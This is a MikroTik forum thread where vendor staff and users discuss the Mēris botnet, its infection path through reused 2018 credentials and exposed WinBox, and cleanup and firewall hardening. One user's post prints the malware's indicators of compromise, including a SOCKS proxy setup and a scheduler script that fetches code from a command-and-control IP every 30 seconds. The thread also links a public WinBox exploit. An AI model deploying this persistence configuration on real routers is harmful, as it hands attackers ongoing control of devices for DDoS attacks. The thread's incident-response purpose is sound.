Community discussions

MikroTik App
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 25031
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Mēris botnet information

Fri Sep 10, 2021 1:43 pm

Many of you have asked, what is this Mēris botnet that some news outlets are discussing right now, and if there is any new vulnerability in RouterOS.

As far as we have seen, these attacks use the same routers that were compromised in 2018, when MikroTik RouterOS had a vulnerability, that was quickly patched.

Unfortunately, closing the vulnerability does not immediately protect these routers. If somebody got your password in 2018, just an upgrade will not help. You must also change password, re-check your firewall if it does not allow remote access to unknown parties, and look for scripts that you did not create.

We have tried to reach all users of RouterOS about this, but many of them have never been in contact with MikroTik and are not actively monitoring their devices. We are working on other solutions too.

As far as we know right now - There are no new vulnerabilities in these devices. RouterOS has been recently independently audited by several contractors.

If you do see a RouterOS device that has malicious scripts or SOCKS configuration that was not created by you, especially if this configuration APPEARED NOW, RECENTLY, WHILE RUNNING A NEW ROUTEROS RELEASE: Please contact us immediately.
No answer to your question? How to write posts
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 25031
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mēris botnet information

Fri Sep 10, 2021 1:48 pm

More specifically, we suggest to disable SOCKS and look in the System -> Scheduler menu. Disable all rules you can't identify. By default, there should be no Scheduler rules, and SOCKS should be off.
No answer to your question? How to write posts
 
mafiosa
Member Candidate
Member Candidate
Posts: 187
Joined: Fri Dec 09, 2016 8:10 pm
Location: Kolkata, India
Contact:

Re: Mēris botnet information

Fri Sep 10, 2021 3:41 pm

Is socks present in v7.1 RC3?
 
R1CH
Forum Veteran
Forum Veteran
Posts: 984
Joined: Sun Oct 01, 2006 11:44 pm

Re: Mēris botnet information

Fri Sep 10, 2021 3:52 pm

Since these infected users still appear to be upgrading to recent RouterOS versions, can the upgrade process look for non-Mikrotik binaries or other signs of infection and warn the administrator to netinstall? If there was a system exploit to run arbitrary code, simply removing socks and scripts and adding a firewall is not enough, as RouterOS does not allow admins to see all processes running on the router. A netinstall is the only way to be sure.

I highly doubt an open socks proxy or similar is responsible for DDOS as that means the attacker still has to generate the traffic elsewhere.
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 25031
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mēris botnet information

Fri Sep 10, 2021 3:59 pm

There are no non-mikrotik binaries involved, only legitimate SOCKS, L2TP and Scheduler configuration.
No answer to your question? How to write posts
 
mada3k
Member
Member
Posts: 446
Joined: Mon Jul 13, 2015 10:53 am
Location: Sweden

Re: Mēris botnet information

Fri Sep 10, 2021 6:58 pm

What was the entry point for the vulnerability - non-firewalled winbox, socks or http ?
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Fri Sep 10, 2021 7:01 pm

The most entry point is the same username and password on all devices after 4 years...
 
R1CH
Forum Veteran
Forum Veteran
Posts: 984
Joined: Sun Oct 01, 2006 11:44 pm

Re: Mēris botnet information

Fri Sep 10, 2021 9:32 pm

There are no non-mikrotik binaries involved, only legitimate SOCKS, L2TP and Scheduler configuration.
What native functions in RouterOS support sending pipelined HTTP requests at these kind of rates? I find it unlikely that the attackers are simply proxying their DDoS traffic through infected Mikrotik devices - why not attack the target directly if they have that much bandwidth available? Especially as they do not know the upstream bandwidth or CPU power of the infected device, not all the proxied traffic is likely to make it out so it would actually reduce the power of their attack. This doesn't make sense.
 
pe1chl
Forum Guru
Forum Guru
Posts: 7733
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mēris botnet information

Fri Sep 10, 2021 10:31 pm

Starting today I see a new flood of random GRE traffic on the internet, not sure if it is caused by this botnet or if it is just coincidence.
It appears to consist of GRE packets with random addresses both outside and inside, and with a UDP payload with random portnumbers and 512 bytes of random data.
Likely they hope that some places will just unpack such GRE traffic when sent to them, and then forward the tunneled traffic. But I don't think MikroTik routers would do that, they would only accept GRE traffic from sources that are configured as peers in a GRE tunnel, right?
But I have seen such storms before, probably during earlier botnet outbreaks.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Fri Sep 10, 2021 11:29 pm

On GRE you can omit only the local source, but you must specify the remote address...
The source can be spoofed, but I hope no one extabilish GRE link on Internet without at least IPsec...
 
User avatar
jwshields
just joined
Posts: 2
Joined: Wed Aug 05, 2020 2:34 am
Location: Seattle, WA, USA
Contact:

Re: Mēris botnet information

Sat Sep 11, 2021 12:49 pm

For the last few days/week or two, I've been receiving a higher than normal amount of tcp portscans and small attacks against my home network. They all seem to be coming from the same IPs, or at least the same /24, usually they seem to be either scanning huge groups of around 10k or more ports each time, or they're continually hitting the same port over and over.
Might not be related to this botnet, but I thought I'd share some oddities I've been seeing
 
mada3k
Member
Member
Posts: 446
Joined: Mon Jul 13, 2015 10:53 am
Location: Sweden

Re: Mēris botnet information

Sat Sep 11, 2021 1:18 pm

Starting today I see a new flood of random GRE traffic on the internet, not sure if it is caused by this botnet or if it is just coincidence.
It appears to consist of GRE packets with random addresses both outside and inside, and with a UDP payload with random portnumbers and 512 bytes of random data.
I also have seen them

These types of lower-level attacks and exploits is quite scary. Some equipment by default picks up ICMP, GRE, ESP/AH packets and other non-TCP/UDP packets and process them in the kernel. Sometimes it's default to allow IPSec IKE as well.
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 2308
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: Mēris botnet information

Sat Sep 11, 2021 2:02 pm

This shows number of hits on my router on port 8291 Winbox, last 4 month. It only counts one IP for each user a day, since all who tries to access a non open port are blocked for 24 hours. There has been no increase of traffic.
8291.jpg
You do not have the required permissions to view the files attached to this post.
 
User avatar
mozerd
Long time Member
Long time Member
Posts: 548
Joined: Thu Oct 05, 2017 3:39 pm
Location: Canada
Contact:

Re: Mēris botnet information

Sat Sep 11, 2021 2:44 pm

Based on my experience installing MOAB for many users .. 100% had very poor firewall security measures due to ignorance and or lack of diligence ... once a router has been compromised the ONLY recourse is to netinstall and manually configure ... MikroTik should make the Netinstall procedure much more transparent [much easier to use] since many get confused by the procedures needed. The DEFAULT firewall currently provided by MikroTik is an excellent starting point ... unfortunately many ignore it.
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 2308
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: Mēris botnet information

Sat Sep 11, 2021 2:58 pm

One of many problems is that many router are at remote location and netinstall only works locally. Some are high up in tower or roof tops etc.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Sat Sep 11, 2021 2:59 pm

Netinstall work also remotely...
If you have at least on control one device, you can netinstall remotely the others...
Obviously exceptions apply.
 
User avatar
anav
Forum Guru
Forum Guru
Posts: 8393
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: Mēris botnet information

Sat Sep 11, 2021 3:15 pm

Based on my experience installing MOAB for many users .. 100% had very poor firewall security measures due to ignorance and or lack of diligence ... once a router has been compromised the ONLY recourse is to netinstall and manually configure ... MikroTik should make the Netinstall procedure much more transparent [much easier to use] since many get confused by the procedures needed. The DEFAULT firewall currently provided by MikroTik is an excellent starting point ... unfortunately many ignore it.
yes, it would be helpful for Mikrotik to make a video that explains their default firewall and to let new users know that they should ignore 98% of the crap on youtube and to go to the forum to get advice when changing the default firewall rules. Concur the netinsall process is a tad convoluted and any way to make it more intuitive or easier would be appreciated.
 
edyatl
Posts: 0
Joined: Sat Sep 11, 2021 8:14 pm

Re: Mēris botnet information

Sat Sep 11, 2021 8:36 pm

And how to check router against Meris malware? Are there any tips how to check and fix? Is there official cure realise?
 
msatter
Forum Guru
Forum Guru
Posts: 2274
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mēris botnet information

Sat Sep 11, 2021 8:39 pm

Second posting here.
 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 6335
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: Mēris botnet information

Sat Sep 11, 2021 10:12 pm

And how to check router against Meris malware? Are there any tips how to check and fix? Is there official cure realise?
As stated in the first post:

If you do see a RouterOS device that has malicious scripts or SOCKS configuration that was not created by you
 
User avatar
madars
Posts: 0
Joined: Sat Sep 11, 2021 10:27 pm
Location: Cambridge, MA

Re: Mēris botnet information

Sat Sep 11, 2021 10:45 pm

I recently helped my friend Ritvars clean up his MikroTik router (a hAP AC running the latest 6.48.4 stable). We would like to note that this router’s factory firmware was v6.44.6 and as such the router had never run a vulnerable RouterOS version.

So how did it become part of Mēris? Simple: my friend previously had an older MikroTik that had WinBox open to the entire world and that older router got compromised at some point in the past. When he replaced this old router he also copied over the old config including changes that Mēris had made. Ooops! Something to check for in your own deployments.

About the indicators of compromise -- they were the same as mentioned above but let us add a bit more detail.

First: SOCKS proxy was enabled, running on a non-standard port. SOCKS uses TCP port 1080 by default and comes disabled. You would definitely know if you had it enabled as it is a very atypical config. Moreover, the SOCKS access list had a single entry with IP range we did not recognize:
/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
At this point the router’s CPU was pegged at 50% and we saw ~200 open SOCKS connections pushing whatever malicious traffic. As we disabled SOCKS proxy the CPU usage promptly dropped to 2%.

Second: router had a scheduled task executing an unknown script. Again, in its default config RouterOS has no scripts and no scheduled tasks defined. Ours looked as follows:
/system scheduler
add interval=30s name=schedule4_ on-event=script4_ policy=\
    ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add dont-require-permissions=no name=script4_ owner=Ritvars policy=\
    ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
    ddress=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-resu\
    lt=no"
Notice that the IP belongs to the same C&C range mentioned above. So we deleted the script and deleted the scheduled task. We did not observe any L2TP changes: the L2TP config was blank, as is the default.

Please note that the same WinBox exploit which presumably was used to gain the initial compromise would also have allowed the attacker to recover all user passwords in plain text (including passwords for deleted users). See details at https://github.com/BigNerd95/WinboxExploit . Therefore you should rotate your passwords in RouterOS and everywhere else you have reused the same. I'd suggest you also make sure to restrict your router management access (e.g. ssh, WinBox) to a minimal subset of networks (ideally: networks you physically control like your LAN). Don’t have them wide open to the entire internet.

Speaking of the latter point: keeping up to date IP lists is harder than it needs to be. For example, MikroTik script limits file access to 4 kilobytes, and while there is a workaround to load IP lists up to 63K, it leaves little room for growth if your IP lists have comments. Is there a better way coming in new RouterOS? :) Moreover, unless I want to manually upgrade RouterOS CA certificates, I have to run
/tool fetch
with
check-certificate=no
as the latest stable RouterOS does not recognize LetsEncrypt. Could you make sure that RouterOS database is in sync with, say, Mozilla’s
ca-certificates
? Here is how Debian maintains their copy: https://salsa.debian.org/debian/ca-certificates.

Finally, thank you for all your hard work. We are very happy users of MikroTik and are very much looking forward to the new 7.x branch hitting stable. WireGuard, ZeroTier, rock solid hardware - what's not to love.
 
msatter
Forum Guru
Forum Guru
Posts: 2274
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mēris botnet information

Sat Sep 11, 2021 11:09 pm


Speaking of the latter point: keeping up to date IP lists is harder than it needs to be. For example, MikroTik script limits file access to 4 kilobytes, and while there is a workaround to load IP lists up to 63K, it leaves little room for growth if your IP lists have comments. Is there a better way coming in new RouterOS? :) [/url].
That 63K has also been been resolved see last posting in the mentioned tread. Import can as large till the router runs out of storage space.
 
User avatar
madars
Posts: 0
Joined: Sat Sep 11, 2021 10:27 pm
Location: Cambridge, MA

Re: Mēris botnet information

Sat Sep 11, 2021 11:20 pm

Hahahahaha, I love the HTTP Range header hack! But I think you will agree that it is brittle: it is not guaranteed that the server won't change the file in between your 64K chunk requests and make the internal state of your script inconsistent.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Sat Sep 11, 2021 11:31 pm

I have invented that method, and is not a hack, is just how http protocol work...

How to download only one piece of file at a time with /tool fetch and put it inside a variable
viewtopic.php?f=9&t=177530

"fetch" is already planned to be managed in the future for file not found, file change. redirect, etc. this is an example:
manage fetch errors
viewtopic.php?f=2&t=178355&p=878643#p878643
 
User avatar
madars
Posts: 0
Joined: Sat Sep 11, 2021 10:27 pm
Location: Cambridge, MA

Re: Mēris botnet information

Sat Sep 11, 2021 11:53 pm

And there is no way to make "the script inconsistent", at least is imported less or more data.
That's arguing semantics. Of course importing less data is not the same as atomically importing the entire list. Note that "When resuming to request more parts of a resource, you need to guarantee that the stored resource has not been modified since the last fragment has been received." In practice this means supplying an ETag or a Last-Modified validator, or accepting data losses. Such data losses probably do not matter much for importing excessively long IP lists but is something I'd want to be fixed in the scripting language itself.
Last edited by madars on Sat Sep 11, 2021 11:57 pm, edited 1 time in total.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Sat Sep 11, 2021 11:56 pm

I know when the blacklists I use are updated, simly do not update at same time, nothing particularly difficult...

That's arguing semantics.
You're starting to write like a troll.
Have you just registered to disturb?
Nobody forces you to use published scripts.
 
msatter
Forum Guru
Forum Guru
Posts: 2274
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mēris botnet information

Sun Sep 12, 2021 12:03 am

Hahahahaha, I love the HTTP Range header hack! But I think you will agree that it is brittle: it is not guaranteed that the server won't change the file in between your 64K chunk requests and make the internal state of your script inconsistent.
There is indeed a delay between the read chunks. The script already cut away the first line and a part of the last lines so that there are clean lines to be imported.
I don't think it is feasable to first fill a loop of subquential array's to minimize the time taken between the chunks read while filling the address-list. An other method could be checking on each loop if the size of the file has changed in the meantime, I can't see the time of the file to download, so that is not an option. If so then the import could restart.

Then, how far do want to go to exclude every point of failure and the import is also logged by default. Checking the log always a good routine.

Edit: the script has been adapted to detect changes in file-size during import. It will retry a set number of times and then give an warning on failure that the user has check if the list is still being maintained.
 
R1CH
Forum Veteran
Forum Veteran
Posts: 984
Joined: Sun Oct 01, 2006 11:44 pm

Re: Mēris botnet information

Sun Sep 12, 2021 3:59 pm

I wonder if there is some traffic amplification bug in the socks proxy, this doesn't make any sense to use as a DDOS botnet if you still have to originate all the attack traffic. I suppose it makes an attack harder to block when it originates from thousands of infected IPs, but based on volume this has to significantly reduce the attack power vs raw volumetric outbound traffic.
 
User avatar
mozerd
Long time Member
Long time Member
Posts: 548
Joined: Thu Oct 05, 2017 3:39 pm
Location: Canada
Contact:

Re: Mēris botnet information

Sun Sep 12, 2021 4:29 pm

Edit: the script has been adapted to detect changes in file-size during import. It will retry a set number of times and then give an warning on failure that the user has check if the list is still being maintained.
@msatter

The only list that I am aware of that may undergo changes is firehol_level1 where the check frequency is 1 minute ... Personally I would not be concerned with changes that takes place by the minute or by the hour .....

Cybercrime IP Feeds by FireHOL exploits HUNDREDS of lists ... IMO its the most comprehensive system built which is why I use them for MOAB.

The code you have been working on would benefit the MikroTik community greatly [and put MOAB out of business] if you adapted the code to exploits the lists that FireHOL produces -- the only caveat being that there is a significant number of duplicate IP's when merging the lists plus the numeric sequence is important to improve performance -- if the numeric sequence is random the insertion takes longer.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Sun Sep 12, 2021 6:23 pm

@mozerd, I invented "How to download only one piece of file at a time with /tool fetch and put it inside a variable"
viewtopic.php?f=9&t=177530
If I didn't, @msatter would have nothing to work with...
I made the code available to everyone, but it's not really polite to credit @msatter,
but @msatter is to be thanked for taking the development forward.
 
User avatar
mozerd
Long time Member
Long time Member
Posts: 548
Joined: Thu Oct 05, 2017 3:39 pm
Location: Canada
Contact:

Re: Mēris botnet information

Sun Sep 12, 2021 7:01 pm

@rextended
Your contribution is very much appreciated, IMO, by everyone. @msatter code exploitation is outstanding and I certainly would like to encourage the development because the MikroTik community would derive excellent benefits.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Sun Sep 12, 2021 9:25 pm

Nothing to add, is true, thanks.
 
msatter
Forum Guru
Forum Guru
Posts: 2274
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mēris botnet information

Sun Sep 12, 2021 11:51 pm

Cybercrime IP Feeds by FireHOL exploits HUNDREDS of lists ... IMO its the most comprehensive system built which is why I use them for MOAB.

The code you have been working on would benefit the MikroTik community greatly [and put MOAB out of business] if you adapted the code to exploits the lists that FireHOL produces -- the only caveat being that there is a significant number of duplicate IP's when merging the lists plus the numeric sequence is important to improve performance -- if the numeric sequence is random the insertion takes longer.
Reading the a list was no problem and using the delimiter allows that IP addresses and IP addresses with range are imported. I did not found it slow on importing and RouterOS will sort the lists. I assume that is done on the moment it is being displayed and in stages.

Merging different lists is an different thing and is best database driven. I am not into that. ;-)

I tested with the FireHOL Level2 list: viewtopic.php?f=9&t=152632&p=879181#p825755 and you have now to supply also the list name without spaces.

The import script is updated, so that on failure the old list is being restored. On successful import the the temporary backup is removed.
 
pe1chl
Forum Guru
Forum Guru
Posts: 7733
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mēris botnet information

Mon Sep 13, 2021 12:30 am

Can we stop the off-topic discussion about address lists or move it to some other topic?
 
brg3466
Member Candidate
Member Candidate
Posts: 122
Joined: Sat Aug 01, 2015 7:29 am

Re: Mēris botnet information

Mon Sep 13, 2021 2:54 am

This shows number of hits on my router on port 8291 Winbox, last 4 month. It only counts one IP for each user a day, since all who tries to access a non open port are blocked for 24 hours. There has been no increase of traffic.
Hello Jotne,
would you mind share your script on how to "block the outside IP for 24hrs if they tries to access your non-open port " ? I think it is a good way to prevent those attacks.

Thanks !
 
User avatar
raimondsp
MikroTik Support
MikroTik Support
Posts: 102
Joined: Mon Apr 27, 2020 10:14 am

Re: Mēris botnet information

Mon Sep 13, 2021 9:28 am

Must be mentioned:

Do not use the same passwords from 2018 ever again!

Even on different routers. The hackers who obtained system user database files via CVE-2018-14847 may apply brute force to try every stolen password on every MikroTik (and maybe even non-MikroTik) device. For example, you had the "#My sUp3R(!) Secr37 P@ssword" password back in 2018. Then you heard about CVE-2018-14847, upgraded RouterOS, changed the password, and verified that there were no malicious scripts. In 2021, you've bought a new router and considering using the old and forgotten #My sUp3R(!) Secr37 P@ssword" again... NO! Don't do this!

Also, changing passwords from something like "jF9ikfW21u-01" to "jF9ikfW21u-02" is not a good idea either due to an iterable pattern.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Mon Sep 13, 2021 10:15 am

(I'm curious to know from now how many people will use the password "#My sUp3R(!) Secr37 P@ssword" :) )
 
djdrastic
Member
Member
Posts: 336
Joined: Wed Aug 01, 2012 2:14 pm

Re: Mēris botnet information

Mon Sep 13, 2021 11:07 am

I had a friend replace his ISP CPE router with a CCR running 6.47.10 over the weekend and he got compromised within probably 5 minutes of initial configuration.Had a socks server running with some weird scheduled tasks after compromise. We netinstalled but really will wait it out until there's better info on what's going on before trying to replace isp router.

I suspect he didn't set his firewall rules correctly on the WAN side so he had services exposed to public internet.Password he said he generated uniquely out of onepass so shouldn't have been a dictionary attack.
 
mkx
Forum Guru
Forum Guru
Posts: 6558
Joined: Thu Mar 03, 2016 10:23 pm

Re: Mēris botnet information

Mon Sep 13, 2021 11:09 am

CCR comes without any default configuration and that includes firewall. So it is essential to do all the configuration before ever exposing it to WAN. And that includes solid firewall rules which is not an easy task for novice ROS user.
 
pe1chl
Forum Guru
Forum Guru
Posts: 7733
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mēris botnet information

Mon Sep 13, 2021 11:28 am

CCR comes without any default configuration and that includes firewall.
It even comes without password! Like almost all MikroTik devices, the admin password is empty on first run. So when it was connected before the password was set, it was quite easy to hack it!
On a "home" device there is protection from the firewall, but still this is something that is frowned upon in 2021.
Most other router manufacturers now deliver their devices with a default password shown on a sticker these days, but MikroTik does this only on a few devices (like "wireless wire") that are sold as preconfigured plug-and-play solutions.
 
djdrastic
Member
Member
Posts: 336
Joined: Wed Aug 01, 2012 2:14 pm

Re: Mēris botnet information

Mon Sep 13, 2021 12:43 pm

Aye agree with you guys.I wasn't present so cannot comment how he configured it initially.
From what I gather he did set the password initially before configuring the WAN as he is required to set a static /30 with his provider to make his circuit work.
 
mada3k
Member
Member
Posts: 446
Joined: Mon Jul 13, 2015 10:53 am
Location: Sweden

Re: Mēris botnet information

Mon Sep 13, 2021 1:06 pm

But this was related to Winbox? (that I've never used and always had the service disabled)

What "novice user" buys a CCR? A Cisco also comes with a blank password by default.
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 2308
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: Mēris botnet information

Mon Sep 13, 2021 1:11 pm

Hello Jotne,
would you mind share your script on how to "block the outside IP for 24hrs if they tries to access your non-open port " ? I think it is a good way to prevent those attacks.
Here you go:
viewtopic.php?f=23&t=178496
 
brg3466
Member Candidate
Member Candidate
Posts: 122
Joined: Sat Aug 01, 2015 7:29 am

Re: Mēris botnet information

Mon Sep 13, 2021 7:16 pm

Thanks again !
 
edyatl
Posts: 0
Joined: Sat Sep 11, 2021 8:14 pm

Re: Mēris botnet information

Tue Sep 14, 2021 12:48 pm

Qrator.Radar team made an individual checker https://radar.qrator.net/, allowing to see if a particular IP address was involved in the Meris attacks.
 
maigonis
Frequent Visitor
Frequent Visitor
Posts: 76
Joined: Sat Jul 20, 2019 8:16 pm

Re: Mēris botnet information

Tue Sep 14, 2021 10:31 pm

To defend my home router I follow technique "Block all, allow a few". I have configured my firewall to allow a few ports that I need and block all other input, including from LAN, only allow my main PC network and VPN to access it. Winbox access, shh, ftp etc are allowed only from those network too, so to access my router remotely I need to connect to VPN. That is the safest option in my opinion.

I have blocked ping also, so no target scanner can ping my network. Of course hackers can attack my host blindly, but that mitigates some portion of attacks. Also always generate strong passwords and use them once (as mentioned already). I use password manager to generate and store my password, so i don't have to remember them.
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 25031
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mēris botnet information

Wed Sep 15, 2021 9:02 am

No answer to your question? How to write posts
 
mducharme
Trainer
Trainer
Posts: 1432
Joined: Tue Jul 19, 2016 6:45 pm

Re: Mēris botnet information

Wed Sep 15, 2021 9:26 am

Is there a possible vulnerability for MNDP on UDP 5678? I've seen this mentioned before, that the Meris botnet devices all seem to have UDP 5678 open, but is this indicative of a vulnerability in MNDP, or instead just a means for the botnet to relocate nodes that have possibly changed IPs and that it has lost track of for whatever reason?
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 25031
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mēris botnet information

Wed Sep 15, 2021 9:30 am

It's just a way to find MikroTik devices, as far as we know. The main intrusion vector right now is admin/no password + Windows malware.
No answer to your question? How to write posts
 
pe1chl
Forum Guru
Forum Guru
Posts: 7733
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mēris botnet information

Wed Sep 15, 2021 11:19 am

Does the Windows malware also attempt to find "saved passwords" in e.g. winbox addresses.cdb and browser password save features?
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 5702
Joined: Tue Feb 25, 2014 12:49 pm
Location: Capalbio, Tuscany, Italy

Re: Mēris botnet information

Wed Sep 15, 2021 11:25 am

If I wrote a malware, it would be the first thing I would do to take away the passwords stored in "Windows Vault" / WinBox / Dude / Firefox, Google, Edge passwords saved on the browser, e-mail passwords saved on thunderbird, outlook, etc.
 
msatter
Forum Guru
Forum Guru
Posts: 2274
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mēris botnet information

Wed Sep 15, 2021 12:42 pm

I have a firewall on Windows that only allow Winbox to use those ports. If they managed to install a infected version of Winbox the firewall will first ask if I want to allow traffic. This because Winbox itself has changed.

I don't have this kind of protection on Android or IOS.
 
loloski
Frequent Visitor
Frequent Visitor
Posts: 96
Joined: Mon Mar 15, 2021 9:10 pm

Re: Mēris botnet information

Fri Sep 17, 2021 6:42 am

To further reduce the likehood of this, I hope mikrotik will also consider to. Bind winbox. On specific interface to the liking of sysadmin, so that winbox will not exposed on the Wan side interface, no firewall rules needed for some novice user, just my 0.2
 
mkx
Forum Guru
Forum Guru
Posts: 6558
Joined: Thu Mar 03, 2016 10:23 pm

Re: Mēris botnet information

Fri Sep 17, 2021 9:00 am

Default configuration (on devices that come with default) on recent ROS versions includes this:
# Establish proper interface list membership
/interface list member 
add list=LAN interface=bridge comment="defconf"                                                                                       
add list=WAN interface=ether1 comment="defconf"

# block access to router's IP and IPv6 services originated not through one of LAN interfaces
# This includes also management access: telnet, ssh and winbox
/ip firewall filter
add chain=input action=drop in-interface-list=!LAN comment="defconf: drop all not coming from LAN"
/ipv6 firewall filter
add chain=input action=drop in-interface-list=!LAN comment="defconf: drop everything else not coming from LAN"

# allow discovery (MNDP) only on LAN interfaces
/ip neighbor discovery-settings 
set discover-interface-list=LAN

# allow MAC services (telnet and winbox) only through LAN interfaces
/tool mac-server 
set allowed-interface-list=LAN
/tool mac-server mac-winbox 
set allowed-interface-list=LAN

If one doesn't mindlessly change these settings and properly maintains interface list membership, router remains properly secured.

There are two notable exceptions:
  1. routers which come without any default config. These are "pro" line of devices (CCR, CRS and select RB models) and those require a knowledgeable administrator to properly configure device.
  2. routers which were initially configured with older ROS version or had IPv6 package installed and enabled after initial configuration reset. ROS upgrade and/or package install doesn't change configuration (other than upgrading some syntax if that's required).
    Nothing much to be done automatically in this case, automagical enforcement of default firewall rules would likely break existing firewall rules and upgrade procedure has no way of detecting the reason for firewall rules to be set in any particular way.


And no, I would not like to see some implicit filtering that can not be changed by (dumb?) administrator. ROS is so much liked by (pro?) users exactly because absolutely whole configuration is transparent to administrator and there's nothing administrator can not change. But yes, freedom does come with cost (which is extremely steep learning curve) and if a novice user can't bear that cost, (s)he should go to other vendor (not something MT would like to advertise, this would hurt their sales quite some I guess).

Perhaps MT's resellers should require buyers to posses some MTCxx certificate? ;-)
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 25031
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mēris botnet information

Fri Sep 17, 2021 11:21 am

We have updated the article on our blog. Please work with your ISPs to block the addresses the botnet is using:
https://blog.mikrotik.com/security/meris-botnet.html
No answer to your question? How to write posts

Who is online

Users browsing this forum: Bing [Bot], mszru and 23 guests